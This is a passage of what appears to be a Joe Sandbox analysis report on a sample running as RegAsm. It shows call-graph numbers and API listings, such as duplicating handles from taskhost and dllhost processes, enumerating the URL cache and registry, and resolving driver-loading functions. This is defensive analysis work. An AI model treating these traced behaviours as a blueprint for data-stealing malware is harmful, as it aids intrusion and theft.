38811->38373 38812->38353 38813->38447 38814->38430 38815->38430 38816->38462 38818 409c89 38817->38818 38818->38487 38819->38515 38821 413d39 38820->38821 38822 413d2f FreeLibrary 38820->38822 38823 40b633 free 38821->38823 38822->38821 38824 413d42 38823->38824 38825 40b633 free 38824->38825 38826 413d4a 38825->38826 38826->38343 38827->38346 38828->38390 38829->38413 38831 44db70 38830->38831 38832 40b6fc memset 38831->38832 38833 409c70 2 API calls 38832->38833 38834 40b732 wcsrchr 38833->38834 38835 40b743 38834->38835 38836 40b746 memset 38834->38836 38835->38836 38837 40b2cc 27 API calls 38836->38837 38838 40b76f 38837->38838 38839 409d1f 6 API calls 38838->38839 38840 40b783 38839->38840 39657 409b98 GetFileAttributesW 38840->39657 38842 40b792 38843 40b7c2 38842->38843 38845 409c70 2 API calls 38842->38845 39658 40bb98 38843->39658 38847 40b7a5 38845->38847 38850 40b2cc 27 API calls 38847->38850 38848 40b837 CloseHandle 38852 40b83e memset 38848->38852 38849 40b817 39692 409a45 GetTempPathW 38849->39692 38853 40b7b2 38850->38853 39691 40a6e6 WideCharToMultiByte 38852->39691 38856 409d1f 6 API calls 38853->38856 38854 40b827 38854->38852 38856->38843 38857 40b866 38858 444432 120 API calls 38857->38858 38859 40b879 38858->38859 38860 40b273 27 API calls 38859->38860 38861 40bad5 38859->38861 38862 40b89a 38860->38862 38863 40b04b ??3@YAXPAX 38861->38863 38864 438552 133 API calls 38862->38864 38865 40baf3 38863->38865 38866 40b8a4 38864->38866 38865->38424 38867 40bacd 38866->38867 38869 4251c4 136 API calls 38866->38869 38868 443d90 110 API calls 38867->38868 38868->38861 38892 40b8b8 38869->38892 38870 40bac6 39704 424f26 122 API calls 38870->39704 38871 40b8bd memset 39695 425413 17 API calls 38871->39695 38874 425413 17 API calls 38874->38892 38877 40a71b MultiByteToWideChar 38877->38892 38878 40a734 MultiByteToWideChar 38878->38892 38881 40b9b5 memcmp 38881->38892 38882 4099c6 2 API calls 38882->38892 38883 404423 37 API calls 38883->38892 38886 4251c4 
136 API calls 38886->38892 38887 40bb3e memset memcpy 39705 40a734 MultiByteToWideChar 38887->39705 38889 40bb88 LocalFree 38889->38892 38892->38870 38892->38871 38892->38874 38892->38877 38892->38878 38892->38881 38892->38882 38892->38883 38892->38886 38892->38887 38893 40ba5f memcmp 38892->38893 39696 4253ef 16 API calls 38892->39696 39697 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38892->39697 39698 4253af 17 API calls 38892->39698 39699 4253cf 17 API calls 38892->39699 39700 447280 memset 38892->39700 39701 447960 memset memcpy memcpy memcpy 38892->39701 39702 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38892->39702 39703 447920 memcpy memcpy memcpy 38892->39703 38893->38892 38894->38426 38896 40aed1 38895->38896 38897 40aec7 FindClose 38895->38897 38896->38477 38897->38896 38899 4099d7 38898->38899 38900 4099da memcpy 38898->38900 38899->38900 38900->38400 38902 40b2cc 27 API calls 38901->38902 38903 44543f 38902->38903 38904 409d1f 6 API calls 38903->38904 38905 44544f 38904->38905 39797 409b98 GetFileAttributesW 38905->39797 38907 44545e 38908 445476 38907->38908 38910 40b6ef 249 API calls 38907->38910 38909 40b2cc 27 API calls 38908->38909 38911 445482 38909->38911 38910->38908 38912 409d1f 6 API calls 38911->38912 38913 445492 38912->38913 39798 409b98 GetFileAttributesW 38913->39798 38915 4454a1 38916 4454b9 38915->38916 38917 40b6ef 249 API calls 38915->38917 38916->38428 38917->38916 38918->38427 38919->38452 38920->38458 38921->38493 38922->38474 38923->38523 38924->38523 38925->38504 38926->38534 38927->38536 38928->38538 38930 414c2e 15 API calls 38929->38930 38931 40c2ae 38930->38931 39001 40c1d3 38931->39001 38936 40c3be 38953 40a8ab 38936->38953 38937 40afcf 2 API calls 38938 40c2fd FindFirstUrlCacheEntryW 38937->38938 38939 40c3b6 38938->38939 38940 40c31e wcschr 38938->38940 38941 40b04b ??3@YAXPAX 38939->38941 38942 40c331 38940->38942 38943 40c35e FindNextUrlCacheEntryW 38940->38943 38941->38936 38945 40a8ab 9 API calls 38942->38945 
38943->38940 38944 40c373 GetLastError 38943->38944 38946 40c3ad FindCloseUrlCache 38944->38946 38947 40c37e 38944->38947 38948 40c33e wcschr 38945->38948 38946->38939 38949 40afcf 2 API calls 38947->38949 38948->38943 38950 40c34f 38948->38950 38951 40c391 FindNextUrlCacheEntryW 38949->38951 38952 40a8ab 9 API calls 38950->38952 38951->38940 38951->38946 38952->38943 39095 40a97a 38953->39095 38956 40a8cc 38956->38545 38957 40a8d0 7 API calls 38957->38956 39100 40b1ab free free 38958->39100 38960 40c3dd 38961 40b2cc 27 API calls 38960->38961 38962 40c3e7 38961->38962 39101 414592 RegOpenKeyExW 38962->39101 38964 40c3f4 38965 40c50e 38964->38965 38966 40c3ff 38964->38966 38980 405337 38965->38980 38967 40a9ce 4 API calls 38966->38967 38968 40c418 memset 38967->38968 39102 40aa1d 38968->39102 38971 40c471 38973 40c47a _wcsupr 38971->38973 38972 40c505 38972->38965 38974 40a8d0 7 API calls 38973->38974 38975 40c498 38974->38975 38976 40a8d0 7 API calls 38975->38976 38977 40c4ac memset 38976->38977 38978 40aa1d 38977->38978 38979 40c4e4 RegEnumValueW 38978->38979 38979->38972 38979->38973 39104 405220 38980->39104 38984 4099c6 2 API calls 38983->38984 38985 40a714 _wcslwr 38984->38985 38986 40c634 38985->38986 39161 405361 38986->39161 38989 40c65c wcslen 39164 4053b6 39 API calls 38989->39164 38990 40c71d wcslen 38990->38552 38992 40c677 38993 40c713 38992->38993 39165 40538b 39 API calls 38992->39165 39167 4053df 39 API calls 38993->39167 38996 40c6a5 38996->38993 38997 40c6a9 memset 38996->38997 38998 40c6d3 38997->38998 39166 40c589 43 API calls 38998->39166 39000->38553 39002 40ae18 9 API calls 39001->39002 39008 40c210 39002->39008 39003 40ae51 9 API calls 39003->39008 39004 40c264 39005 40aebe FindClose 39004->39005 39007 40c26f 39005->39007 39006 40add4 2 API calls 39006->39008 39013 40e5ed memset memset 39007->39013 39008->39003 39008->39004 39008->39006 39009 40c231 _wcsicmp 39008->39009 39010 40c1d3 34 API calls 39008->39010 39009->39008 39011 40c248 
39009->39011 39010->39008 39026 40c084 21 API calls 39011->39026 39014 414c2e 15 API calls 39013->39014 39015 40e63f 39014->39015 39016 409d1f 6 API calls 39015->39016 39017 40e658 39016->39017 39027 409b98 GetFileAttributesW 39017->39027 39019 40e667 39020 409d1f 6 API calls 39019->39020 39022 40e680 39019->39022 39020->39022 39028 409b98 GetFileAttributesW 39022->39028 39023 40e68f 39024 40c2d8 39023->39024 39029 40e4b2 39023->39029 39024->38936 39024->38937 39026->39008 39027->39019 39028->39023 39050 40e01e 39029->39050 39031 40e593 39032 40e5b0 39031->39032 39033 40e59c DeleteFileW 39031->39033 39034 40b04b ??3@YAXPAX 39032->39034 39033->39032 39036 40e5bb 39034->39036 39035 40e521 39035->39031 39073 40e175 39035->39073 39038 40e5c4 CloseHandle 39036->39038 39039 40e5cc 39036->39039 39038->39039 39041 40b633 free 39039->39041 39040 40e573 39043 40e584 39040->39043 39044 40e57c CloseHandle 39040->39044 39042 40e5db 39041->39042 39046 40b633 free 39042->39046 39094 40b1ab free free 39043->39094 39044->39043 39045 40e540 39045->39040 39093 40e2ab 30 API calls 39045->39093 39048 40e5e3 39046->39048 39048->39024 39051 406214 22 API calls 39050->39051 39052 40e03c 39051->39052 39053 40e16b 39052->39053 39054 40dd85 74 API calls 39052->39054 39053->39035 39055 40e06b 39054->39055 39055->39053 39056 40afcf ??2@YAPAXI ??3@YAXPAX 39055->39056 39057 40e08d OpenProcess 39056->39057 39058 40e0a4 GetCurrentProcess DuplicateHandle 39057->39058 39062 40e152 39057->39062 39059 40e0d0 GetFileSize 39058->39059 39060 40e14a CloseHandle 39058->39060 39063 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39059->39063 39060->39062 39061 40e160 39065 40b04b ??3@YAXPAX 39061->39065 39062->39061 39064 406214 22 API calls 39062->39064 39066 40e0ea 39063->39066 39064->39061 39065->39053 39067 4096dc CreateFileW 39066->39067 39068 40e0f1 CreateFileMappingW 39067->39068 39069 40e140 CloseHandle CloseHandle 39068->39069 39070 40e10b MapViewOfFile 39068->39070 39069->39060 39071 
40e13b CloseHandle 39070->39071 39072 40e11f WriteFile UnmapViewOfFile 39070->39072 39071->39069 39072->39071 39074 40e18c 39073->39074 39075 406b90 11 API calls 39074->39075 39076 40e19f 39075->39076 39077 40e1a7 memset 39076->39077 39078 40e299 39076->39078 39083 40e1e8 39077->39083 39079 4069a3 ??3@YAXPAX free 39078->39079 39080 40e2a4 39079->39080 39080->39045 39081 406e8f 13 API calls 39081->39083 39082 406b53 SetFilePointerEx ReadFile 39082->39083 39083->39081 39083->39082 39084 40dd50 _wcsicmp 39083->39084 39085 40e283 39083->39085 39089 40742e 8 API calls 39083->39089 39090 40aae3 wcslen wcslen _memicmp 39083->39090 39091 40e244 _snwprintf 39083->39091 39084->39083 39086 40e291 39085->39086 39087 40e288 free 39085->39087 39088 40aa04 free 39086->39088 39087->39086 39088->39078 39089->39083 39090->39083 39092 40a8d0 7 API calls 39091->39092 39092->39083 39093->39045 39094->39031 39097 40a980 39095->39097 39096 40a8bb 39096->38956 39096->38957 39097->39096 39098 40a995 _wcsicmp 39097->39098 39099 40a99c wcscmp 39097->39099 39098->39097 39099->39097 39100->38960 39101->38964 39103 40aa23 RegEnumValueW 39102->39103 39103->38971 39103->38972 39105 405335 39104->39105 39106 40522a 39104->39106 39105->38552 39107 40b2cc 27 API calls 39106->39107 39108 405234 39107->39108 39109 40a804 8 API calls 39108->39109 39110 40523a 39109->39110 39149 40b273 39110->39149 39112 405248 _mbscpy _mbscat GetProcAddress 39113 40b273 27 API calls 39112->39113 39114 405279 39113->39114 39152 405211 GetProcAddress 39114->39152 39116 405282 39117 40b273 27 API calls 39116->39117 39118 40528f 39117->39118 39153 405211 GetProcAddress 39118->39153 39120 405298 39121 40b273 27 API calls 39120->39121 39122 4052a5 39121->39122 39154 405211 GetProcAddress 39122->39154 39124 4052ae 39125 40b273 27 API calls 39124->39125 39126 4052bb 39125->39126 39155 405211 GetProcAddress 39126->39155 39128 4052c4 39129 40b273 27 API calls 39128->39129 39130 4052d1 39129->39130 39156 405211 GetProcAddress 
39130->39156 39132 4052da 39133 40b273 27 API calls 39132->39133 39134 4052e7 39133->39134 39157 405211 GetProcAddress 39134->39157 39136 4052f0 39137 40b273 27 API calls 39136->39137 39138 4052fd 39137->39138 39158 405211 GetProcAddress 39138->39158 39140 405306 39141 40b273 27 API calls 39140->39141 39142 405313 39141->39142 39159 405211 GetProcAddress 39142->39159 39144 40531c 39145 40b273 27 API calls 39144->39145 39146 405329 39145->39146 39160 405211 GetProcAddress 39146->39160 39148 405332 39148->39105 39150 40b58d 27 API calls 39149->39150 39151 40b18c 39150->39151 39151->39112 39152->39116 39153->39120 39154->39124 39155->39128 39156->39132 39157->39136 39158->39140 39159->39144 39160->39148 39162 405220 39 API calls 39161->39162 39163 405369 39162->39163 39163->38989 39163->38990 39164->38992 39165->38996 39166->38993 39167->38990 39169 40440c FreeLibrary 39168->39169 39170 40436d 39169->39170 39171 40a804 8 API calls 39170->39171 39172 404377 39171->39172 39173 404383 39172->39173 39174 404405 39172->39174 39175 40b273 27 API calls 39173->39175 39174->38564 39174->38566 39174->38567 39176 40438d GetProcAddress 39175->39176 39177 40b273 27 API calls 39176->39177 39178 4043a7 GetProcAddress 39177->39178 39179 40b273 27 API calls 39178->39179 39180 4043ba GetProcAddress 39179->39180 39181 40b273 27 API calls 39180->39181 39182 4043ce GetProcAddress 39181->39182 39183 40b273 27 API calls 39182->39183 39184 4043e2 GetProcAddress 39183->39184 39185 4043f1 39184->39185 39186 4043f7 39185->39186 39187 40440c FreeLibrary 39185->39187 39186->39174 39187->39174 39189 404413 FreeLibrary 39188->39189 39190 40441e 39188->39190 39189->39190 39190->38581 39191->38577 39193 40447e 39192->39193 39194 40442e 39192->39194 39193->38577 39195 40b2cc 27 API calls 39194->39195 39196 404438 39195->39196 39197 40a804 8 API calls 39196->39197 39198 40443e 39197->39198 39199 404445 39198->39199 39200 404467 39198->39200 39201 40b273 27 API calls 39199->39201 39200->39193 39203 
404475 FreeLibrary 39200->39203 39202 40444f GetProcAddress 39201->39202 39202->39200 39204 404460 39202->39204 39203->39193 39204->39200 39206 4135f6 39205->39206 39207 4135eb FreeLibrary 39205->39207 39206->38584 39207->39206 39209 4449c4 39208->39209 39210 444a52 39208->39210 39211 40b2cc 27 API calls 39209->39211 39210->38601 39210->38602 39212 4449cb 39211->39212 39213 40a804 8 API calls 39212->39213 39214 4449d1 39213->39214 39215 40b273 27 API calls 39214->39215 39216 4449dc GetProcAddress 39215->39216 39217 40b273 27 API calls 39216->39217 39218 4449f3 GetProcAddress 39217->39218 39219 40b273 27 API calls 39218->39219 39220 444a04 GetProcAddress 39219->39220 39221 40b273 27 API calls 39220->39221 39222 444a15 GetProcAddress 39221->39222 39223 40b273 27 API calls 39222->39223 39224 444a26 GetProcAddress 39223->39224 39225 40b273 27 API calls 39224->39225 39226 444a37 GetProcAddress 39225->39226 39227 40b273 27 API calls 39226->39227 39229->38612 39230->38612 39231->38612 39232->38612 39233->38603 39235 403a29 39234->39235 39249 403bed memset memset 39235->39249 39237 403ae7 39262 40b1ab free free 39237->39262 39238 403a3f memset 39243 403a2f 39238->39243 39240 403aef 39240->38619 39241 409d1f 6 API calls 39241->39243 39242 409b98 GetFileAttributesW 39242->39243 39243->39237 39243->39238 39243->39241 39243->39242 39244 40a8d0 7 API calls 39243->39244 39244->39243 39246 40a051 GetFileTime CloseHandle 39245->39246 39247 4039ca CompareFileTime 39245->39247 39246->39247 39247->38619 39248->38620 39250 414c2e 15 API calls 39249->39250 39251 403c38 39250->39251 39252 409719 2 API calls 39251->39252 39253 403c3f wcscat 39252->39253 39254 414c2e 15 API calls 39253->39254 39255 403c61 39254->39255 39256 409719 2 API calls 39255->39256 39257 403c68 wcscat 39256->39257 39263 403af5 39257->39263 39260 403af5 20 API calls 39261 403c95 39260->39261 39261->39243 39262->39240 39264 403b02 39263->39264 39265 40ae18 9 API calls 39264->39265 39274 403b37 39265->39274 39266 
403bdb 39268 40aebe FindClose 39266->39268 39267 40add4 wcscmp wcscmp 39267->39274 39269 403be6 39268->39269 39269->39260 39270 40a8d0 7 API calls 39270->39274 39271 40ae18 9 API calls 39271->39274 39272 40ae51 9 API calls 39272->39274 39273 40aebe FindClose 39273->39274 39274->39266 39274->39267 39274->39270 39274->39271 39274->39272 39274->39273 39276 409d1f 6 API calls 39275->39276 39277 404190 39276->39277 39290 409b98 GetFileAttributesW 39277->39290 39279 40419c 39280 4041a7 6 API calls 39279->39280 39281 40435c 39279->39281 39282 40424f 39280->39282 39281->38641 39282->39281 39284 40425e memset 39282->39284 39286 409d1f 6 API calls 39282->39286 39287 40a8ab 9 API calls 39282->39287 39291 414842 39282->39291 39284->39282 39285 404296 wcscpy 39284->39285 39285->39282 39286->39282 39288 4042b6 memset memset _snwprintf wcscpy 39287->39288 39288->39282 39289->38645 39290->39279 39294 41443e 39291->39294 39293 414866 39293->39282 39295 41444b 39294->39295 39296 414451 39295->39296 39297 4144a3 GetPrivateProfileStringW 39295->39297 39298 414491 39296->39298 39299 414455 wcschr 39296->39299 39297->39293 39301 414495 WritePrivateProfileStringW 39298->39301 39299->39298 39300 414463 _snwprintf 39299->39300 39300->39301 39301->39293 39302->38650 39304 40b2cc 27 API calls 39303->39304 39305 409615 39304->39305 39306 409d1f 6 API calls 39305->39306 39307 409625 39306->39307 39332 409b98 GetFileAttributesW 39307->39332 39309 409634 39310 409648 39309->39310 39333 4091b8 memset 39309->39333 39312 40b2cc 27 API calls 39310->39312 39314 408801 39310->39314 39313 40965d 39312->39313 39315 409d1f 6 API calls 39313->39315 39314->38653 39314->38698 39316 40966d 39315->39316 39385 409b98 GetFileAttributesW 39316->39385 39318 40967c 39318->39314 39319 409681 39318->39319 39386 409529 72 API calls 39319->39386 39321 409690 39321->39314 39322->38675 39332->39309 39387 40a6e6 WideCharToMultiByte 39333->39387 39335 409202 39388 444432 39335->39388 39338 40b273 27 API calls 39339 409236 
39338->39339 39434 438552 39339->39434 39342 409383 39344 40b273 27 API calls 39342->39344 39346 409399 39344->39346 39348 438552 133 API calls 39346->39348 39367 4093a3 39348->39367 39352 4094ff 39463 443d90 39352->39463 39355 4251c4 136 API calls 39355->39367 39359 4093df 39462 424f26 122 API calls 39359->39462 39361 4253cf 17 API calls 39361->39367 39365 40951d 39365->39310 39367->39352 39367->39355 39367->39359 39367->39361 39369 4093e4 39367->39369 39460 4253af 17 API calls 39369->39460 39385->39318 39386->39321 39387->39335 39484 4438b5 39388->39484 39390 44444c 39396 409215 39390->39396 39498 415a6d 39390->39498 39392 4442e6 11 API calls 39394 44469e 39392->39394 39393 444486 39395 4444b9 memcpy 39393->39395 39433 4444a4 39393->39433 39394->39396 39398 443d90 110 API calls 39394->39398 39502 415258 39395->39502 39396->39338 39396->39365 39398->39396 39399 444524 39400 444541 39399->39400 39401 44452a 39399->39401 39505 444316 39400->39505 39402 416935 16 API calls 39401->39402 39402->39433 39405 444316 18 API calls 39406 444563 39405->39406 39407 444316 18 API calls 39406->39407 39433->39392 39572 438460 39434->39572 39436 409240 39436->39342 39437 4251c4 39436->39437 39584 424f07 39437->39584 39439 4251e4 39440 4251f7 39439->39440 39441 4251e8 39439->39441 39592 4250f8 39440->39592 39462->39352 39485 4438d0 39484->39485 39491 4438c9 39484->39491 39486 415378 memcpy memcpy 39485->39486 39487 4438d5 39486->39487 39488 4154e2 10 API calls 39487->39488 39489 443906 39487->39489 39487->39491 39488->39489 39490 443970 memset 39489->39490 39489->39491 39492 44398b 39490->39492 39491->39390 39494 41975c 10 API calls 39492->39494 39496 4439a0 39492->39496 39493 415700 10 API calls 39495 4439c0 39493->39495 39494->39496 39495->39491 39497 418981 10 API calls 39495->39497 39496->39491 39496->39493 39497->39491 39499 415a77 39498->39499 39500 415a8d 39499->39500 39501 415a7e memset 39499->39501 39500->39393 39501->39500 39503 4438b5 11 API calls 39502->39503 39504 
41525d 39503->39504 39504->39399 39506 444328 39505->39506 39507 444423 39506->39507 39508 44434e 39506->39508 39509 4446ea 11 API calls 39507->39509 39510 432d4e memset memset memcpy 39508->39510 39516 444381 39509->39516 39511 44435a 39510->39511 39513 444375 39511->39513 39518 44438b 39511->39518 39512 432d4e memset memset memcpy 39514 4443ec 39512->39514 39515 416935 16 API calls 39513->39515 39514->39516 39515->39516 39516->39405 39518->39512 39573 41703f 11 API calls 39572->39573 39574 43847a 39573->39574 39575 43848a 39574->39575 39576 43847e 39574->39576 39578 438270 133 API calls 39575->39578 39577 4446ea 11 API calls 39576->39577 39580 438488 39577->39580 39579 4384aa 39578->39579 39579->39580 39581 424f26 122 API calls 39579->39581 39580->39436 39582 4384bb 39581->39582 39583 438270 133 API calls 39582->39583 39583->39580 39585 424f1f 39584->39585 39586 424f0c 39584->39586 39588 424eea 11 API calls 39585->39588 39587 416760 11 API calls 39586->39587 39589 424f18 39587->39589 39590 424f24 39588->39590 39589->39439 39590->39439 39641 413f4f 39614->39641 39617 413f37 K32GetModuleFileNameExW 39618 413f4a 39617->39618 39618->38712 39620 413969 wcscpy 39619->39620 39621 41396c wcschr 39619->39621 39624 413a3a 39620->39624 39621->39620 39623 41398e 39621->39623 39646 4097f7 wcslen wcslen _memicmp 39623->39646 39624->38712 39626 41399a 39627 4139a4 memset 39626->39627 39628 4139e6 39626->39628 39647 409dd5 GetWindowsDirectoryW wcscpy 39627->39647 39629 413a31 wcscpy 39628->39629 39630 4139ec memset 39628->39630 39629->39624 39648 409dd5 GetWindowsDirectoryW wcscpy 39630->39648 39632 4139c9 wcscpy wcscat 39632->39624 39634 413a11 memcpy wcscat 39634->39624 39636 413cb0 GetModuleHandleW 39635->39636 39637 413cda 39635->39637 39636->39637 39638 413cbf GetProcAddress 39636->39638 39639 413ce3 GetProcessTimes 39637->39639 39640 413cf6 39637->39640 39638->39637 39639->38715 39640->38715 39642 413f2f 39641->39642 39643 413f54 39641->39643 39642->39617 39642->39618 

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                APIs
                                                                • memset.MSVCRT ref: 0040DDAD
                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                • _wcsicmp.MSVCRT ref: 0040DED8
                                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                • memset.MSVCRT ref: 0040DF5F
                                                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                • API String ID: 708747863-3398334509
                                                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                APIs
                                                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                • free.MSVCRT ref: 00418803
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                • String ID:
                                                                • API String ID: 1355100292-0
                                                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                APIs
                                                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: FileFind$FirstNext
                                                                • String ID:
                                                                • API String ID: 1690352074-0
                                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                APIs
                                                                • memset.MSVCRT ref: 0041898C
                                                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                Memory Dump Source
                                                                • Source File: 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: InfoSystemmemset
                                                                • String ID:
                                                                • API String ID: 3558857096-0
                                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                 control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 